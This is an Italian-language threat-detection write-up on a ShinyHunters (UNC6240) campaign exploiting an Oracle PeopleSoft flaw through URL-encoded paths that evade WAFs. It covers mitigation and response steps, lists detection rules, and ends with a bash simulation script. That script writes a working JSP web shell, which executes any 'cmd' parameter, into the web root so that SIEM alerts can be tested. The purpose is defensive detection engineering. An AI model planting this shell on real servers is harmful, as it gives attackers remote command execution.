ShinyHunters Riprende Grandi Attacchi su Larga Scala che Prendono di Mira Oracle PeopleSoft
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
L’attore di minaccia UNC6240 (ShinyHunters) ha ripreso lo sfruttamento su larga scala dei sistemi Oracle PeopleSoft tramite CVE-2026-35273. La campagna sfrutta percorsi codificati in URL per aggirare i Web Application Firewall (WAF) e accedere al punto finale vulnerabile del Hub di Gestione Ambientale. Gli attaccanti distribuiscono più web shell insieme al backdoor SIDEEYE per stabilire la persistenza, mantenere l’accesso non autorizzato e facilitare l’esfiltrazione di dati.
Indagine
Mandiant e Google Threat Intelligence Group hanno documentato una transizione dallo sfruttamento di zero-day a giugno 2026 ad attacchi N-day contro ambienti non patchati. I ricercatori hanno identificato l’uso di codifica URL (/PSEMHUB/) per aggirare il filtraggio WAF basato su stringhe. L’analisi ha rivelato una sequenza d’attacco ricorrente che coinvolge la validazione del target attraverso oggetti Java serializzati, seguita dalla distribuzione di installatori trojanizzati e utility di tunneling.
Mitigazione
Le organizzazioni dovrebbero immediatamente installare la patch dell’Oracle Security Alert che affronta CVE-2026-35273 e disabilitare o rimuovere l’applicazione PSEMHUB. Le configurazioni WAF dovrebbero ispezionare e bloccare i percorsi URL normalizzati invece di affidarsi esclusivamente alla corrispondenza letterale di stringhe. I team di sicurezza dovrebbero anche ruotare le credenziali accessibili dal layer web ed esaminare le directory delle applicazioni alla ricerca di file sospetti o non autorizzati.
Risposta
Se viene scoperta una web shell, i difensori dovrebbero considerare l’host compromesso e preservare le prove forensi prima della rimedio. Abilitare l’auditing a livello di host per identificare processi shell inattesi lanciati dal processo Java di WebLogic. Ruotare le credenziali esposte, incluse le stringhe di connessione al database e le credenziali cloud, mentre si rivede l’attività di rete in uscita per gli indicatori noti di C2.
Flusso d’attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Possibile Enumerazione di Sistema (via cmdline)
Comando e Controllo Sospetti da Richiesta DNS con Dominio di Primo Livello (TLD) Insolito (via dns)
Possibile Manipolazione di Stringhe Codificate Base64 (via cmdline)
Caricamento/Download di File Remoto tramite Strumenti Standard (via cmdline)
IOC (HashSha256) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft
IOC (SourceIP) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft
IOC (DestinationIP) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft
Distribuzione di Web Shell tramite Sfruttamento di CVE-2026-35273 [Creazione del Processo di Windows]
Sfruttamento UNC6240 di Oracle PeopleSoft usando Web Shell [Webserver]
Esecuzione della Simulazione
-
Narrativa dell’Attacco & Comandi: L’avversario identifica un’istanza di Oracle PeopleSoft e cerca di sfruttare una vulnerabilità. Per aggirare le semplici firme WAF che cercano la stringa “PSEMHUB”, l’attaccante utilizza la codifica URL per richiedere
/PSEMHUB/. Dopo lo sfruttamento riuscito, l’attaccante rilascia una web shell chiamatax.jspnella radice web per fornire un’interfaccia persistente per l’esecuzione di comandi. Questa sequenza imita i specifici indicatori di compromissione (IOC) identificati nella campagna di sfruttamento UNC6240. -
Script di Test di Regressione:
#!/bin/bash # Simulation Script for UNC6240 Web Shell Detection # 1. Define paths (Adjust based on target environment) WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" TARGET_URL="http://localhost/PSEMHUB/" echo "[+] Creating simulated web shell: $WEB_ROOT/$SHELL_NAME" # Create a simple JSP web shell content echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null echo "[+] Triggering detection via URL-encoded request..." # Use curl to request the encoded path to generate the log entry curl -s "$TARGET_URL" > /dev/null echo "[+] Simulation complete. Check SIEM for detection." -
Comandi di pulizia:
#!/bin/bash # Cleanup Script WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" echo "[+] Cleaning up simulation files..." sudo rm -f $WEB_ROOT/$SHELL_NAME echo "[+] Cleanup finished."